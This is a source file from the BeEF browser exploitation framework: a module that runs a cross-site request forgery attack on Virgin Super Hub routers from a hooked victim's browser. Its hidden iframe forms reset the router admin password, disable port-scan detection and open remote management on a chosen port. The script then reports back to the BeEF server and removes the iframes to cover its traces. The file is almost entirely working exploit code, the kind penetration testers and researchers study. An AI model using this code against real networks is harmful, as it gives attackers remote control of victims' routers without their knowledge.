CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/router/virgin_superhub_csrf/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8

9
	var gateway = '<%= @base %>'; 
10
	var passwd  = '<%= @password %>';
11
	var port    = '<%= @port %>';
12
	var timeout = 15;
13

14
	var virgin_superhub_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", "application/x-www-form-urlencoded", [
15
		{'type':'hidden', 'name':'NetgearPassword',        'value':passwd},
16
		{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
17
		{'type':'hidden', 'name':'RestoreFactoryNo',       'value':'0x00'}
18
	]);
19

20
	var virgin_superhub_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", "application/x-www-form-urlencoded", [
21
		{'type':'hidden', 'name':'cbPortScanDetection',    'value':''}
22
	]);
23

24
	var virgin_superhub_iframe3_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", "application/x-www-form-urlencoded", [
25
		{'type':'hidden', 'name':'NetgearVMRmEnable',      'value':'0x01'},
26
		{'type':'hidden', 'name':'NetgearVMRmPortNumber',  'value':port}
27
	]);
28

29
	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
30

31
	cleanup = function() {
32
		document.body.removeChild(virgin_superhub_iframe1_<%= @command_id %>);
33
		document.body.removeChild(virgin_superhub_iframe2_<%= @command_id %>);
34
		document.body.removeChild(virgin_superhub_iframe3_<%= @command_id %>);
35
	}
36
	setTimeout("cleanup()", timeout*1000);
37

38
});
39

40

41
Product

Resources

Company
